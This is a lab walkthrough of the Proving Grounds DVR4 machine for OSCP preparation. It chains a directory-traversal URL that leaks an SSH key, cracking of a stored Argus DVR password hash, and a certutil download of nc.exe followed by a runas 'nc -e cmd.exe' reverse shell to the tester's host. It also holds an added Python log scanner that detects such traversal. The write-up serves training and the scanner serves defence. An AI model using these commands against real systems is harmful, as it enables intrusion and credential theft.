Proving Grounds: DVR4
Today we will take a look at Proving Grounds: DVR4. My purpose in sharing this post is to prepare for the OSCP exam. It is also to show you the way if you are stuck. Please try to understand each step and take notes.
- Network scan
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
49664/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
- Argus Surveillance DVR (8080)
The SSH port is open, so I can get the user's id_rsa. The first URL shows the username; the second reads the key:
http://192.168.249.179:8080/Users.html
http://192.168.249.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa
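A defender-side check for the request above, as an added example that is not part of the original write-up: it scans access-log lines for RESULTPAGE values that climb out of the web root, including double-encoded ones. The log format, sample lines and function names are constructed for illustration.

```python
# Added example: flag directory traversal in the RESULTPAGE parameter of access logs.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines (assumed format, not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=Users.html HTTP/1.1" 200',
    '10.0.0.9 "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa HTTP/1.1" 200',
    '10.0.0.9 "GET /WEBACCOUNT.CGI?RESULTPAGE=%252e%252e%255cWindows%255cwin.ini HTTP/1.1" 200',
    '10.0.0.7 "GET /index.html HTTP/1.1" 200',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# File names taken from the write-up; extend for your own environment.
SENSITIVE = ("/.ssh/", "id_rsa", "dvrparams.ini")


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so a double-encoded '..' is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return the findings for one access-log line (empty list if clean)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.upper() != "RESULTPAGE":
            continue
        # Normalise Windows separators and case before checking path segments.
        path = fully_decode(value).replace("\\", "/").lower()
        if ".." in path.split("/"):
            findings.append("traversal")
        if any(marker in path for marker in SENSITIVE):
            findings.append("sensitive-file")
    return findings


def scan(lines):
    """Map line index -> findings for every suspicious line."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_line(line))}
```

A 200 response on a line flagged with both findings means the file was actually served, so the key and any credentials stored in the same profile should be treated as exposed.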
- Viewer
└─# chmod 400 id_rsa
└─# ssh Viewer@192.168.249.179 -i id_rsa
We found where the password is stored:
C:\ProgramData\PY_Software\Argus Surveillance DVR>more DVRParams.ini
[Users]
----------
LoginName0=Administrator
----------
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
----------
Now let's crack the password; there is an exploit for that.
Edit
# Change this :)
pass_hash = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"
Run
└─# python 50130.py
#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############
[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown
It couldn't find the last one. When I open the code and look inside, I see that its table contains no symbols, so let's check the candidates one by one.
First, we upload the nc.exe file
C:\ProgramData\PY_Software\Argus Surveillance DVR>certutil -urlcache -split -f http://192.168.49.249/nc.exe
**** Online ****
0000 …
e800
CertUtil: -URLCache command completed successfully.
Run as administrator
C:\ProgramData\PY_Software\Argus Surveillance DVR>runas /env /profile /user:Administrator "C:\ProgramData\PY_Software\Argus Surveillance DVR\nc.exe -e cmd.exe 192.168.49.249 21"
I checked them one by one:
14WatchD0g!
14WatchD0g@
14WatchD0g#
14WatchD0g$
14WatchD0g%
The correct one: 14WatchD0g$
Enter the password for Administrator:
Attempting to start C:\ProgramData\PY_Software\Argus Surveillance DVR\nc.exe -e cmd.exe 192.168.49.249 21 as user "DVR4\Administrator" ...
and boom
└─# nc -nvlp 21
listening on [any] 21 ...
connect to [192.168.49.249] from (UNKNOWN) [192.168.249.179] 51075
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\ProgramData\PY_Software\Argus Surveillance DVR>whoami
whoami
dvr4\administrator
And now we are Administrator on the system.
If you have any questions or comments, please do not hesitate to write. Have a good day.